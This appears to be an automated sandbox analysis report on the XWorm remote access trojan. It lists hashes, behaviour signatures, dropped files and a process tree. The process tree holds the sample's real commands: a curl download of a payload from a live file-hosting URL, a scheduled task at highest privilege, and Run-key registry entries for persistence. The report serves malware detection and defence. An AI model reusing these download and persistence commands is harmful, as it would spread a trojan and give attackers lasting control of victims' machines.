Analysis

  • max time kernel
    146s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230221-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-03-2023 01:10

General

  • Target

    XWormContent.exe

  • Size

    10KB

  • MD5

    7d4e7449b76c34210100ea88c163c7fb

  • SHA1

    ef679b47eb42f162355e8772ceb25712dc7ec75e

  • SHA256

    4fc4ae98d231e2bf0b8d4ad5463d9d4f673c1d5d63dc98838cf14a61d64ce6e6

  • SHA512

    d0ef46b3e5622160e9f6ce5cac8f2b14a10bad8e2c1f91a7e1d9713fd6ed844cf74817ca050e1a2d95ee9cd24ec01c67b6e279acddc95449553effbb8354ec1e

  • SSDEEP

    192:qLH2ANdaLix1upSiP/VunlYJLLLTuzTVQLFjb5cqfM:qLH2ydaLiO3hPLTucTf

Malware Config

Signatures

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\XWormContent.exe
    "C:\Users\Admin\AppData\Local\Temp\XWormContent.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4380
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cmd.bat" "
      2⤵
      • Drops file in Windows directory
      • Suspicious use of WriteProcessMemory
      PID:2016
      • C:\Windows\system32\curl.exe
        curl https://download1497.mediafire.com/av4hta6mkbagq9q63EQcCM1ZDZ0MJb3pOMqTati_JxDbj6616K7H9HKcefCbImq3V6MPY3E5pcdmBsEqSj4uScyyKg/ex02u2k9g7cros3/XClient.exe --output XWormPanel.exe
        3⤵
          PID:4316
        • C:\Windows\system32\timeout.exe
          timeout -t 3
          3⤵
          • Delays execution with timeout.exe
          PID:32
        • C:\Users\Admin\AppData\Local\Temp\XWormPanel.exe
          XWormPanel.exe
          3⤵
          • Checks computer location settings
          • Drops startup file
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:3888
          • C:\Windows\System32\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XWormPanel" /tr "C:\Users\Admin\AppData\Local\Temp\XWormPanel.exe"
            4⤵
            • Creates scheduled task(s)
            PID:3488
        • C:\Windows\system32\reg.exe
          reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\XWormContent.exe /f
          3⤵
          • Adds Run key to start application
          • Modifies registry key
          PID:4772
        • C:\Windows\system32\reg.exe
          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\XWormContent.exe /f
          3⤵
          • Adds Run key to start application
          • Modifies registry key
          PID:776
    • C:\Users\Admin\AppData\Local\Temp\XWormPanel.exe
      C:\Users\Admin\AppData\Local\Temp\XWormPanel.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:3984
    • C:\Users\Admin\AppData\Local\Temp\XWormPanel.exe
      C:\Users\Admin\AppData\Local\Temp\XWormPanel.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1412

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XWormPanel.exe.log

      Filesize

      654B

      MD5

      2ff39f6c7249774be85fd60a8f9a245e

      SHA1

      684ff36b31aedc1e587c8496c02722c6698c1c4e

      SHA256

      e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

      SHA512

      1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

    • C:\Users\Admin\AppData\Local\Temp\XWormPanel.exe

      Filesize

      156KB

      MD5

      ed44dc5ec5d2f4f29288cc873d7b6e5e

      SHA1

      63f471a8a2f5d21c6cc717ff4df5963fe0b426be

      SHA256

      4060e66fbf7ff0ba0514d76d7e89e7e79f75b381d8145eb1fad15da55a2a9393

      SHA512

      5aa192bfa71a94915e50ecdb40d59452b9c44bafd019b4d0632455a53034df6a28dd1bef663b0ad20889a60f65165d3ea317d1be3230c0d36d59377126a9d2a3

    • C:\Users\Admin\AppData\Local\Temp\XWormPanel.exe

      Filesize

      156KB

      MD5

      ed44dc5ec5d2f4f29288cc873d7b6e5e

      SHA1

      63f471a8a2f5d21c6cc717ff4df5963fe0b426be

      SHA256

      4060e66fbf7ff0ba0514d76d7e89e7e79f75b381d8145eb1fad15da55a2a9393

      SHA512

      5aa192bfa71a94915e50ecdb40d59452b9c44bafd019b4d0632455a53034df6a28dd1bef663b0ad20889a60f65165d3ea317d1be3230c0d36d59377126a9d2a3

    • C:\Users\Admin\AppData\Local\Temp\XWormPanel.exe

      Filesize

      156KB

      MD5

      ed44dc5ec5d2f4f29288cc873d7b6e5e

      SHA1

      63f471a8a2f5d21c6cc717ff4df5963fe0b426be

      SHA256

      4060e66fbf7ff0ba0514d76d7e89e7e79f75b381d8145eb1fad15da55a2a9393

      SHA512

      5aa192bfa71a94915e50ecdb40d59452b9c44bafd019b4d0632455a53034df6a28dd1bef663b0ad20889a60f65165d3ea317d1be3230c0d36d59377126a9d2a3

    • C:\Users\Admin\AppData\Local\Temp\XWormPanel.exe

      Filesize

      156KB

      MD5

      ed44dc5ec5d2f4f29288cc873d7b6e5e

      SHA1

      63f471a8a2f5d21c6cc717ff4df5963fe0b426be

      SHA256

      4060e66fbf7ff0ba0514d76d7e89e7e79f75b381d8145eb1fad15da55a2a9393

      SHA512

      5aa192bfa71a94915e50ecdb40d59452b9c44bafd019b4d0632455a53034df6a28dd1bef663b0ad20889a60f65165d3ea317d1be3230c0d36d59377126a9d2a3

    • C:\Users\Admin\AppData\Local\Temp\cmd.bat

      Filesize

      1KB

      MD5

      9ed2e107d38ab102bfe7614cfd24e829

      SHA1

      9541263008adf001fa4c3a0236f627223380d509

      SHA256

      b7583f69e19e71f24a2820d9decb63402084072889114ccab8fc98b3d16bc598

      SHA512

      31ab6308ba8840d2bc8667f45cec80090f595501df7851beba8584ed4556e505ddd3550cc83cdaeac38f6889904814ea155a7f779552e1c53a20885a0aefb6d2

    • C:\Users\Admin\AppData\Roaming\Temp

      Filesize

      1KB

      MD5

      9ed2e107d38ab102bfe7614cfd24e829

      SHA1

      9541263008adf001fa4c3a0236f627223380d509

      SHA256

      b7583f69e19e71f24a2820d9decb63402084072889114ccab8fc98b3d16bc598

      SHA512

      31ab6308ba8840d2bc8667f45cec80090f595501df7851beba8584ed4556e505ddd3550cc83cdaeac38f6889904814ea155a7f779552e1c53a20885a0aefb6d2

    • memory/3888-145-0x0000000000660000-0x000000000068C000-memory.dmp

      Filesize

      176KB

    • memory/3888-161-0x00000000026F0000-0x0000000002700000-memory.dmp

      Filesize

      64KB

    • memory/3888-162-0x00000000026F0000-0x0000000002700000-memory.dmp

      Filesize

      64KB

    • memory/4380-133-0x0000000000180000-0x0000000000188000-memory.dmp

      Filesize

      32KB